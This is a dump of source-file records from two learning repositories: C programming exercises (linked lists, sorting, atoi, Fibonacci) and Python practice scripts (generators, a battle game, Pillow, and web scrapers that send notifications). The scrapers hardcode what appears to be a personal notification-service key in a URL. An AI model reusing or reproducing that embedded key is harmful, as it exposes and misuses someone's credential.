\"lists.h\"\n/**\n * print_dlistint - prints all the elements of a dlistint_t list.\n * @h: given list.\n * Return: number of nodes.\n */\nsize_t print_dlistint(const dlistint_t *h)\n{\n\tint elements = 0;\n\n\tfor (; h != NULL; h = h->next, elements++)\n\t\tprintf(\"%d\\n\", h->n);\n\treturn (elements);\n}\n" }, { "alpha_fraction": 0.3851590156555176, "alphanum_fraction": 0.434628963470459, "avg_line_length": 11.30434799194336, "blob_id": "39a7478336ee67d666c264fcfd204374f29009fa", "content_id": "a68702315c178bf25bd0e4457ff630473d1ec79e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 283, "license_type": "no_license", "max_line_length": 43, "num_lines": 23, "path": "/0x04-more_functions_nested_loops/5-more_numbers.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * more_numbers - Prints the numbers 0 to 14, ten times.\n *\n */\n\nvoid more_numbers(void)\n{\n\tint a, x;\n\n\tfor (a = 0; a <= 9; a++)\n\t{\n\t\tfor (x = 0; x <= 14; x++)\n\t\t{\n\t\t\tif (x > 9)\n\t\t\t{\n\t\t\t\t_putchar(x / 10 + '0');\n\t\t\t}\n\t\t\t_putchar(x % 10 + '0');\n\t\t}\n\t_putchar('\\n');\n\t}\n}\n" }, { "alpha_fraction": 0.6049625873565674, "alphanum_fraction": 0.6096888780593872, "avg_line_length": 21.469026565551758, "blob_id": "9371666a2b8db24f46dd210ace0bdd6fa53b0dfa", "content_id": "8cdaa9713575519afb06b6ffb18b3cad6eae69e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2539, "license_type": "no_license", "max_line_length": 76, "num_lines": 113, "path": "/0x1B-sorting_algorithms/1-insertion_sort_list.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * first_swap - looks for the first node whose value is bigger than the\n * next node's value, in order to swap their positions\n * @list: list to sort\n * Return: the node that holds the lower value after the first swap\n */\nlistint_t 
*first_swap(listint_t **list)\n{\n\tlistint_t *cursor;\n\tlistint_t *next;\n\tlistint_t *prev;\n\tlistint_t *n_n;\n\n\tfor (cursor = *list; cursor->next != NULL; cursor = cursor->next)\n\t{\n\t\tif (cursor->n > cursor->next->n)\n\t\t{\n\t\t\tnext = cursor->next;\n\t\t\tprev = cursor->prev;\n\t\t\tn_n = next->next;\n\t\t\tcursor->next = n_n;\n\t\t\tcursor->prev = next;\n\t\t\tif (prev)\n\t\t\t\tprev->next = next;\n\t\t\tnext->prev = prev;\n\t\t\tnext->next = cursor;\n\t\t\tif (n_n)\n\t\t\t\tn_n->prev = cursor;\n\t\t\tcursor = cursor->prev;\n\t\t\tif (cursor->prev == NULL)\n\t\t\t\t*list = cursor;\n\t\t\tprint_list(*list);\n\t\t\tbreak;\n\t\t}\n\t}\n\treturn (cursor);\n}\n/**\n * backward - loops from the node where the swap happened back to the head,\n * in order to find out if there is a node with a smaller value than the\n * current node.\n * @elem: node where the swap happened\n * @list: list to sort\n * Return: 0 if first_swap moved the node all the way to the tail.\n * 1 if the node did not reach the tail, but there is no smaller\n * value than the current node left in the list\n * 2 if smaller values existed and the value became the lowest in the\n * list.\n */\nint backward(listint_t **elem, listint_t **list)\n{\n\tlistint_t *cursor, *next, *prev, *p_p;\n\tint a;\n\n\tif ((*elem)->next == NULL)\n\t\ta = 0;\n\telse\n\t\ta = 1;\n\tfor (cursor = *elem; cursor && cursor->prev; cursor = cursor->prev)\n\t{\n\t\tif (cursor->n < cursor->prev->n)\n\t\t{\n\t\t\tnext = cursor->next;\n\t\t\tprev = cursor->prev;\n\t\t\tp_p = prev->prev;\n\t\t\tcursor->next = prev;\n\t\t\tcursor->prev = p_p;\n\t\t\tif (p_p)\n\t\t\t\tp_p->next = cursor;\n\t\t\tif (next)\n\t\t\t\tnext->prev = prev;\n\t\t\tprev->next = next;\n\t\t\tprev->prev = cursor;\n\t\t\tcursor = cursor->next;\n\t\t\tif (cursor->prev->prev != NULL)\n\t\t\t\tprint_list(*list);\n\t\t\telse\n\t\t\t\ta = 2;\n\t\t}\n\t}\n\t*elem = cursor;\n\treturn (a);\n}\n/**\n * insertion_sort_list - sorts a doubly linked list of integers in ascending\n * order using the Insertion sort algorithm\n * @list: unsorted list of integers\n * Return: Nothing\n */\nvoid insertion_sort_list(listint_t **list)\n{\n\tlistint_t *cursor;\n\tint cont = 1;\n\n\tif (list == NULL || *list == NULL)\n\t\treturn;\n\n\twhile (cont != 0)\n\t{\n\t\tcont = 0;\n\t\tcursor = first_swap(list);\n\t\tif (cursor->next != NULL)\n\t\t\tcont = 1;\n\t\tcont = backward(&cursor, list);\n\t\tif (cursor->prev == NULL)\n\t\t{\n\t\t\t*list = cursor;\n\t\t\tif (cont != 0 && cont != 1)\n\t\t\t\tprint_list(*list);\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.8012422323226929, "alphanum_fraction": 0.8012422323226929, "avg_line_length": 53, "blob_id": "db2e1ee5b21fd218b3d630b1bcf23b01a74da4e5", "content_id": "a02738f27f0ae97dbfb6149eddac47ccc5535340", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 161, "license_type": "no_license", "max_line_length": 86, "num_lines": 3, "path": "/0x05-pointers_arrays_strings/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This project is about pointers, arrays, strings and the use of loops and nested loops.\n\nThe objective is to solve problems using these types of objects and loops." 
}, { "alpha_fraction": 0.4007936418056488, "alphanum_fraction": 0.4246031641960144, "avg_line_length": 13, "blob_id": "d6e85ec2aee1dfd835de14a2e6cea6b502c7ffcb", "content_id": "ad0feba692154e858df2b343cd24f14b94378a4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 504, "license_type": "no_license", "max_line_length": 45, "num_lines": 36, "path": "/0x05-pointers_arrays_strings/100-atoi.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * _atoi - function that convert to integrer.\n * @s: input string.\n *\n * Return: integrer.\n */\nint _atoi(char *s)\n{\n\tunsigned int res = 0, sing = 1, i, si;\n\n\tfor (i = 0; s[i] != '\\0'; i++)\n\t{\n\t\tif (s[i] >= '0' && s[i] <= '9')\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tif (s[i] == '-')\n\t\t{\n\t\t\tsing = -sing;\n\t\t}\n\t}\n\tfor (si = i; s[si] != '\\0'; ++si)\n\t{\n\t\tif (s[si] >= '0' && s[si] <= '9')\n\t\t{\n\t\t\tres = res * 10 + s[si] - '0';\n\t\t}\n\t\telse\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t}\n\treturn (sing * res);\n}\n" }, { "alpha_fraction": 0.532567024230957, "alphanum_fraction": 0.5593869686126709, "avg_line_length": 13.5, "blob_id": "951b5243c1916f481d7a1fb51df877510e963c3b", "content_id": "397e4817aa6d4c02d7cf62a9024076ad2d6c2e3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 261, "license_type": "no_license", "max_line_length": 55, "num_lines": 18, "path": "/0x04-more_functions_nested_loops/1-isdigit.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _isdigit - Verify if variable is a digit from 0 to 9\n * @c: variable for value input.\n * Return: when input is a digit return 1.\n */\n\nint _isdigit(int c)\n{\n\tif (c >= '0' && c <= '9')\n\t{\n\t\treturn (1);\n\t}\n\telse\n\t{\n\t\treturn (0);\n\t}\n}\n" }, { "alpha_fraction": 0.5848684310913086, "alphanum_fraction": 0.6013157963752747, "avg_line_length": 18, "blob_id": "2de9cc516561a70384d63450ec1e805b81ed6ab0", "content_id": "fc24ec7a700eff4692feb78fd8d6245282ea16d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1520, "license_type": "no_license", "max_line_length": 74, "num_lines": 80, "path": "/0x13-more_singly_linked_lists/102-free_listint_safe.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n\n/**\n * free_listpoint2 - frees a listpoin_t list.\n * @head: pointer to first node.\n */\nvoid free_listpoint2(listpoin_t *head)\n{\n\tlistpoin_t *cursor;\n\n\twhile (head != NULL)\n\t{\n\t\tcursor = head;\n\t\thead = head->next;\n\t\tfree(cursor);\n\t}\n\tfree(head);\n}\n\n/**\n * add_nodepoint2 - adds a new node at the beginning of a listpoin_t list.\n * @head: pointer to first node.\n * @p: given address.\n * Return: the address of the new element, or NULL if it failed.\n */\nlistpoin_t *add_nodepoint2(listpoin_t **head, void *p)\n{\n\tlistpoin_t *temp2;\n\n\ttemp2 = malloc(sizeof(listpoin_t));\n\tif (temp2 == NULL)\n\t\texit(98);\n\ttemp2->p = p;\n\ttemp2->next = *head;\n\t*head = temp2;\n\treturn (temp2);\n}\n\n/**\n * free_listint_safe - frees a listint_t list.\n * @h: pointer to first node.\n * Return: number of nodes in the list.\n */\nsize_t free_listint_safe(listint_t **h)\n{\n\tint count = 0;\n\tlistint_t *cursor = NULL;\n\tlistint_t *temp = 
NULL;\n\tlistpoin_t *cursor2 = NULL;\n\tlistpoin_t *head_strp = NULL;\n\n\tif (*h == NULL)\n\t\treturn (0);\n\tadd_nodepoint2(&head_strp, (void *)*h);\n\tfor (; *h != NULL; count++)\n\t{\n\t\tif ((*h)->next)\n\t\t\ttemp = (*h)->next;\n\t\telse\n\t\t\ttemp = NULL;\n\t\tfor (cursor2 = head_strp; cursor2 != NULL; cursor2 = cursor2->next)\n\t\t{\n\t\t\tif (temp == cursor2->p)\n\t\t\t{\n\t\t\t\tcount++;\n\t\t\t\tfree(*h);\n\t\t\t\tfree_listpoint2(head_strp);\n\t\t\t\t*h = NULL;\n\t\t\t\treturn (count);\n\t\t\t}\n\t\t}\n\t\tadd_nodepoint2(&head_strp, (void *)temp);\n\t\tcursor = *h;\n\t\t*h = (*h)->next;\n\t\tfree(cursor);\n\t}\n\t*h = NULL;\n\tfree_listpoint2(head_strp);\n\treturn (count);\n}\n" }, { "alpha_fraction": 0.5611940026283264, "alphanum_fraction": 0.5611940026283264, "avg_line_length": 14.952381134033203, "blob_id": "4a1e24b1d372151834ea802738060cbde736107a", "content_id": "f0868b9cc82d2c5b4bf898b664ecb7e21f152241", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 335, "license_type": "no_license", "max_line_length": 45, "num_lines": 21, "path": "/0x07-pointers_arrays_strings/2-strchr.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stddef.h>\n/**\n * _strchr - locates a character in a string.\n * @s: input string.\n * @c: character to be found.\n * Return: pointer to the first occurrence of c, or NULL.\n */\nchar *_strchr(char *s, char c)\n{\n\tunsigned int i = 0;\n\n\tfor (; ; i++)\n\t{\n\t\tif (s[i] == c)\n\t\t\treturn (s + i);\n\t\tif (!s[i])\n\t\t\treturn (NULL);\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.4949037432670593, "alphanum_fraction": 0.5175538063049316, "avg_line_length": 16.65999984741211, "blob_id": "f6895d2f082a001f63207d328dc07294b6324d79", "content_id": "ed26460e6679982df5b37ad89b7aac9f5cfd499d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 883, "license_type": "no_license", "max_line_length": 70, "num_lines": 50, "path": "/0x02-functions_nested_loops/104-fibonacci.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n/**\n * main - check the code for Holberton School students.\n *\n *\n * Return: Always 0.\n */\n\nint main(void)\n{\n\tlong int in, ln, iter, itnum, next, ini, lni, inl, lnl, nexti, nextl;\n\tlong int itnuml = 8, tendig = 1000000000, carry;\n\n\tin = 1;\n\tln = 2;\n\titnum = 86;\n\tprintf(\"%ld, \", in);\n\tprintf(\"%ld, \", ln);\n\n\tfor (iter = 0; iter <= itnum; iter++)\n\t{ next = in + ln;\n\t\tprintf(\"%ld, \", next);\n\t\tin = ln;\n\t\tln = next;\n\t}\n\tfor (iter = 0; iter <= itnuml; iter++)\n\t{\n\t\tif (iter == 0)\n\t\t{ ini = in % tendig;\n\t\t\tlni = ln % tendig;\n\t\t\tinl = in / tendig;\n\t\t\tlnl = ln / tendig;\n\t\t}\n\t\telse\n\t\t{ ini = lni;\n\t\t\tinl = lnl;\n\t\t\tlni = nexti;\n\t\t\tlnl = nextl;\n\t\t}\n\t\tcarry = (ini + lni) / tendig;\n\t\tnexti = (ini + lni) % tendig;\n\t\tnextl = inl + lnl + carry;\n\t\tprintf(\"%ld%09ld\", nextl, nexti);\n\t\tif (!(iter == itnuml))\n\t\t\tprintf(\"%s\", \", \");\n\t\telse\n\t\t\tprintf(\"%s\", \"\\n\");\n\t}\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.46049660444259644, "alphanum_fraction": 0.4808126389980316, "avg_line_length": 11.657142639160156, "blob_id": "2a4d5c6c179a1a536b7a8ba642fe64ca990d71b3", "content_id": "5e96479a53957f731721c70e1022c6fc5608e560", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", 
"length_bytes": 443, "license_type": "no_license", "max_line_length": 55, "num_lines": 35, "path": "/0x02-functions_nested_loops/102-fibonacci.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n/**\n * main - check the code for Holberton School students.\n *\n *\n * Return: Always 0.\n */\n\nint main(void)\n{\n\tlong int in, ln, iter;\n\tlong int next;\n\n\tin = 1;\n\tln = 2;\n\tprintf(\"%ld, \", in);\n\tprintf(\"%ld, \", ln);\n\n\tfor (iter = 0; iter <= 47; iter++)\n\t{\n\t\tnext = in + ln;\n\t\tprintf(\"%ld\", next);\n\t\tif (!(iter == 47))\n\t\t{\n\t\t\tprintf(\"%s\", \", \");\n\t\t}\n\t\telse\n\t\t{\n\t\t\tprintf(\"%s\", \"\\n\");\n\t\t}\n\t\tin = ln;\n\t\tln = next;\n\t}\n\treturn (0);\n}\n" } ]
142
khaledbnmohamed/SpamDetectorNaiveBayes
https://github.com/khaledbnmohamed/SpamDetectorNaiveBayes
8b1500bda0a5b26c47452e2f90a97558cf15ac0a
edfd26852d0afc4a4a6a73712991fb5fd451ef58
59179f7f0f8f344c648c191f3ad1f4cebe564cd4
refs/heads/master
2020-04-02T14:32:41.624127
2018-10-24T21:08:24
2018-10-24T21:08:24
154,528,679
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6710816621780396, "alphanum_fraction": 0.6795963644981384, "avg_line_length": 33.83516311645508, "blob_id": "62a09646e30fc89d9f3436258b9b61a7787fa062", "content_id": "39dd1496900510ef51472c72199b5371759eb90f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3171, "license_type": "no_license", "max_line_length": 332, "num_lines": 91, "path": "/Spam.py", "repo_name": "khaledbnmohamed/SpamDetectorNaiveBayes", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport string\nimport pprint\nimport numpy as np\nfrom collections import Counter\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\n\n\n\nwith open('SMSSpamCollection.csv') as f:\n df = pd.read_table(f, sep='\\t', header=None, names=[\"label\",'sms_message'],\n lineterminator='\\n')\n\n\ndf[\"label\"] = df.label.map({\"ham\": 0, \"spam\": 1})\n\n# df['label'] = map(df,di)\n\n#############count vector from scratch on small example data list##########\n\n\ndocuments = ['Hello, how are you!',\n 'Win money, win from home.',\n 'Call me now.',\n 'Hello, Call hello you tomorrow?']\n\n\nlower_case_documents = []\nsans_punctuation_documents = []\nfrequency_list = []\nfrequency_list = Counter()\nfor element in documents:\n \tlower_case_documents.append(element.lower())\n\nfor i in lower_case_documents:\n\tsans_punctuation_documents.append(i.translate(str.maketrans('','',string.punctuation)))\nfor i in lower_case_documents:\n\tfrequency_list.update(Counter(i.split())) ##not completely correct needs to append all results\n#pprint.pprint(frequency_list) \n#print(sans_punctuation_documents)\n\n# print(df.head(5))\n# print(table[1:6,]) \n\n\n\ncount_vector= CountVectorizer(input=documents, encoding='utf-8', decode_error='strict', strip_accents=None, lowercase=True, preprocessor=None, tokenizer=None, stop_words=None, token_pattern=r\"(?u)\\b\\w\\w+\\b\", ngram_range=(1, 1), analyzer='word', max_df=1.0, min_df=1, max_features=None, vocabulary=None, binary=False, dtype=np.int64)\ncount_vector.fit(documents)\ncount_vector.get_feature_names()\n\ndoc_array = count_vector.transform(documents).toarray() #matrix creation then change to array\n\n# print(doc_array)\n\nfrequency_matrix = pd.DataFrame({'Column1':doc_array[:,0],'Column2':doc_array[:,1]})\n\n# print(frequency_matrix)\n\n\n############## Done scratching & back to real world##################\n\nX_train, X_test, y_train, y_test = train_test_split(df['sms_message'], \n df['label'], \n random_state=1)\n\nprint('Number of rows in the total set: {}'.format(df.shape[0]))\nprint('Number of rows in the training set: {}'.format(X_train.shape[0]))\nprint('Number of rows in the test set: {}'.format(X_test.shape[0]))\n\ncount_vector = CountVectorizer()\ntraining_data = count_vector.fit_transform(X_train)\ntesting_data = count_vector.transform(X_test) #WE DON'T DIT OUR TEST DATA HERE\n\n\n\n#FINISHED ^^^^ DATA PREPROCESSING AND NEXT SECTION IS IMPLEMENTING THE TRAINING ALGORITHM####\n\nnaive_bayes = MultinomialNB()\nnaive_bayes.fit(training_data,y_train)\n\npredictions = naive_bayes.predict(testing_data)\n\n# print(predictions)\n\nprint('Accuracy score: ', format(accuracy_score(y_test, predictions) * 100) + \"%\")\nprint('Precision score: ', format(precision_score(y_test, predictions)))\nprint('Recall score: ', 
format(recall_score(y_test, predictions)))\nprint('F1 score: ', format(f1_score(y_test, predictions)))\n\n" } ]
1
JoseMCoronado/odoo_o_pontx
https://github.com/JoseMCoronado/odoo_o_pontx
32ac12b8fbd0887caf80ef7c2b2c0383e98a4ef6
4348168609b122541e0982220ee7768a94583092
06c9c5cbf6abbdf6432d44dc31923538dc012505
refs/heads/master
2021-01-15T17:29:11.033435
2017-08-09T03:16:19
2017-08-09T03:16:19
99,757,484
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6421207785606384, "alphanum_fraction": 0.646539032459259, "avg_line_length": 31.33333396911621, "blob_id": "bcd6f08fd3935e112fd6c1713baf89c80ae14c6e", "content_id": "04acf21030a40cce78220b98723e8f9d0c658e86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 679, "license_type": "no_license", "max_line_length": 90, "num_lines": 21, "path": "/__manifest__.py", "repo_name": "JoseMCoronado/odoo_o_pontx", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Made for Odoo Online. See Odoo LICENSE file for full copyright and licensing details.\n\n{\n 'name': '[JOS] Automated Payment on Successful Payment TX',\n 'category': 'Accounting',\n 'summary': 'Custom',\n 'version': '1.0',\n 'description': \"\"\"\nThis custom module for Odoo Online automatically creates an account.payment\nrecord on successful payment transactions (from payment acquirer). For Authorize.net ONLY.\n \"\"\",\n 'depends': ['base','payment_authorize','account_accountant','base_action_rule'],\n 'data': [\n 'data/fields_actions.xml',\n 'data/views.xml',\n\n ],\n 'installable': True,\n 'application': True,\n}\n" } ]
1
zuosc/PythonCode
https://github.com/zuosc/PythonCode
eae5a4f80e892869791f894b4264397edb8dce44
3592f5780fc9e335fa880a1f7e9aac0e9d33439e
73795d3eb6490dafa0d17344988c193da7c340be
refs/heads/master
2021-01-18T17:46:12.870782
2018-04-04T13:13:45
2018-04-04T13:13:45
69,157,151
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.3823038339614868, "alphanum_fraction": 0.4223706126213074, "avg_line_length": 14.763157844543457, "blob_id": "ce012692e29d53e6d1714ed6a4162534252114cf", "content_id": "8f62d0ed625ccd77a9ca4f7dd5241fb44b66f77e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 641, "license_type": "permissive", "max_line_length": 53, "num_lines": 38, "path": "/7generator.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-10-01\n#generator 生成器 (一边循环一边计算的机制,称为生成器:generator)\n\ng = (x * x for x in range(10))\nfor n in g:\n print(n)\nprint('---------------')\n\n\ndef fib(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n = n + 1\n return 'done'\n\n\nfib(10)\n\nprint('--------------------------------------------')\n\n\ndef triangles():\n L = [1]\n while True:\n yield L\n L.append(0)\n L = [L[i - 1] + L[i] for i in range(len(L))]\n\n\nn = 0\nfor t in triangles():\n print(t)\n n = n + 1\n if n == 19:\n break\n" }, { "alpha_fraction": 0.4848484992980957, "alphanum_fraction": 0.5211039185523987, "avg_line_length": 33.867923736572266, "blob_id": "84ddd41c7bd8df7126db30a4abbd2e2ce93a3432", "content_id": "4b65cea94628408d2716007194b99f6d958bace6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1924, "license_type": "permissive", "max_line_length": 115, "num_lines": 53, "path": "/Demo/soldierAttack.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# !/usr/bin/env python3\n# Power by hw 2017-01-10\n\nimport random\n\nclass Game(object):\n\n def __init__(self):\n self.Tom = {'Name': \"Tom\", 'Blood': 120, 'Attack': 40, 'Defense': 10, 'Hit': 40, 'Dodge': 20, 'Crit': 20}\n self.Jhon = {'Name': \"Jhon\", 'Blood': 150, 'Attack': 25, 'Defense': 20, 'Hit': 30, 'Dodge': 50, 'Crit': 15}\n\n def attack_behavior(self,soldierA,soldierB,count):\n print ('第%s回合...' % count)\n hitresult = soldierA['Hit'] + 50 - soldierB['Dodge'] > 100 - random.randint(0,100)\n if hitresult:\n critresult = soldierA['Crit'] > 100 - random.randint(0,100)\n if critresult:\n soldierBBlood = soldierB['Blood'] - (soldierA['Attack'] * 2 - soldierB['Defense'])\n else:\n soldierBBlood = soldierB['Blood'] - (soldierA['Attack'] - soldierB['Defense'])\n\n soldierB['Blood'] = soldierBBlood\n if count % 2 != 0:\n print('%s剩余血量:%d' % (soldierA['Name'], soldierA['Blood']))\n print('%s剩余血量:%d' % (soldierB['Name'], soldierB['Blood']))\n else:\n print('%s剩余血量:%d' % (soldierB['Name'], soldierB['Blood']))\n print('%s剩余血量:%d' % (soldierA['Name'], soldierA['Blood']))\n if critresult:\n print('%s对%s造成了双倍的伤害!!!' % (soldierA['Name'], soldierB['Name']))\n return soldierBBlood\n\n else:\n print('%s闪避了%s的攻击!!!' 
% (soldierA['Name'], soldierB['Name']))\n return 9999\n\n\ngame = Game()\n\ncount = 0\nflag = 1\n\nwhile flag > 0:\n count = count + 1\n if count % 2 != 0:\n result = game.attack_behavior(game.Tom, game.Jhon, count)\n else:\n result = game.attack_behavior(game.Jhon,game.Tom,count)\n print ('\\n')\n if(result <= 0):\n print ('游戏结束...')\n flag = 0\n" }, { "alpha_fraction": 0.5428571701049805, "alphanum_fraction": 0.6928571462631226, "avg_line_length": 16.625, "blob_id": "ff718d2a523dedcb38e77fa57cb5880d8bcf4ccc", "content_id": "0e4661f663add5d7a0e231eabda48a5fb0edb7ac", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "permissive", "max_line_length": 32, "num_lines": 8, "path": "/BuiltInModule/datetimeMouule.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2017-01-09\n# 内置函数 datetime\n\n\nfrom datetime import datetime\ndt = datetime(2017,4,5,16,22,54)\nprint(dt)" }, { "alpha_fraction": 0.5968483090400696, "alphanum_fraction": 0.6474064588546753, "avg_line_length": 30.06122398376465, "blob_id": "48c16b97218e05e882d17bd0a9d8baa02620c5ca", "content_id": "97406e0e86842dfa65b1e81fd9f56889a2554831", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1583, "license_type": "permissive", "max_line_length": 130, "num_lines": 49, "path": "/Demo/keygiveaway.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# /usr/bin/env python3\n# Power by zuosc\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport time\n\ndef getLastName():\n f = open('keygiveaway.txt', 'r')\n content = f.read()\n return content.strip()\n\ndef updateName(name):\n f = open('keygiveaway.txt', 'w')\n f.write(name)\n\n\ndef sengMsg(desp):\n sendurl = 'http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\n params = {'text': \"keygiveaway\", 'desp': \"游戏名称:\"+desp}\n params = urllib.parse.urlencode(params)\n urllib.request.urlopen(sendurl + params)\n\nurl = 'http://keygiveaway.com'\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'\nreq = urllib.request.Request(url, headers={'User-Agent':user_agent})\nresponse = urllib.request.urlopen(req)\nhtml = response.read().decode('utf-8')\nsoup = BeautifulSoup(html,\"html.parser\")\ntrs = soup.findAll('table')[0].findAll(\"tbody\")[0].findAll(\"tr\")\ntds = trs[0].findAll(\"td\")\nprintDes = \"\"\n\ngameType = tds[3].find(\"img\").attrs[\"alt\"]\nname = tds[5].find(\"h4\").text.strip()\nlastName = getLastName()\n\nprintDes = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\nprintDes += \"\\r\\n新获得的游戏类型是:\" + gameType\nprintDes += \"\\r\\n游戏名称:\" + name\nprintDes += \"\\r\\n上次记录的游戏名称为:\" + lastName\nprintDes += \"\\r\\n------------------------------------------------\\r\\n\"\n\nif (((gameType == \"Steam\") | (gameType == \"Othrer\")) & (lastName != name)):\n sengMsg(name)\n updateName(name)\n\nprint(printDes)\n\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 15.066666603088379, "blob_id": "941fe09072c870ee7aed4cdd10fc576c2f3f2a7b", "content_id": "e9d64dceb97f8a79a5b664b0a771efb39db3a45c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 240, "license_type": "permissive", "max_line_length": 34, "num_lines": 15, "path": 
"/thirdpartymodule/usepillow.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# _*_ coding:utf8 _*_\n\n'annotation: use pillow module'\n\n__author__ = 'zuosc'\n\nfrom PIL import Image\n\nim = Image.open('other.png')\nprint(im.format, im.size, im.mode)\n\n\nim.thumbnail((50, 50))\nim.save('thumb.jpg', 'png')" }, { "alpha_fraction": 0.6014198660850525, "alphanum_fraction": 0.6440162062644958, "avg_line_length": 23.549999237060547, "blob_id": "0575bb262e7c2e301414f92eb85faae4b216edab", "content_id": "b13929ac2c08bfeac1c69fe39579092482463700", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 996, "license_type": "permissive", "max_line_length": 94, "num_lines": 40, "path": "/Demo/biquge_shengxu.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n# !usr/bin/env python3\n# Power by zuosc\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\n\ndef getLatChapter():\n shengxuAddr = 'http://www.yinyuanren.com'\n html = urllib.request.urlopen(shengxuAddr).read()\n soup = BeautifulSoup(html, 'html.parser')\n lastChapter = soup.find_all('a')[-5]['href']\n return lastChapter\n\n\ndef sengMsg(chapter):\n sendurl = 'http://sc.ftqq.com/SCU5209T50ff781c69372d9b370387f5c079be01587ae52428055.send?'\n params = {'text': \"圣墟新章节\", 'desp': chapter}\n params = urllib.parse.urlencode(params)\n urllib.request.urlopen(sendurl + params)\n\ntry:\n lastChapter = getLatChapter()\n f = open('shengxu.txt','r')\n content = f.read()\n\n if content == lastChapter:\n pass\n\n else:\n f = open('shengxu.txt', 'w')\n f.write(lastChapter)\n sengMsg(lastChapter)\n f.close()\nexcept:\n f = open('shengxu.txt', 'w')\n f.write(getLatChapter())\n f.close()\n sengMsg(lastChapter)\n\n\n\n\n" }, { "alpha_fraction": 0.3545454442501068, "alphanum_fraction": 0.44545453786849976, "avg_line_length": 14.857142448425293, "blob_id": "a8202237a63025b851d7c5566a4f1fe1315953d4", "content_id": "156554c7b4192336b816ccf8b27471fe4c1749c0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "permissive", "max_line_length": 38, "num_lines": 7, "path": "/4slice.py", "repo_name": "zuosc/PythonCode", "src_encoding": "UTF-8", "text": "# -*- coding:utf8 -*-\n# Power by zuosc 2016-09-27\n# 数据切片\n\nL = ['A', 'B', 'C', 'D' 'E', 'F', 'G']\n\nprint(L[:3])" }, { "alpha_fraction": 0.5993377566337585, "alphanum_fraction": 0.6655629277229309, "avg_line_length": 29.200000762939453, "blob_id": "94675a060ece2c455857d53a4bc31819057c7974", "content_id": "7afe9e643352205fb3d413474cc061114f077020", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": 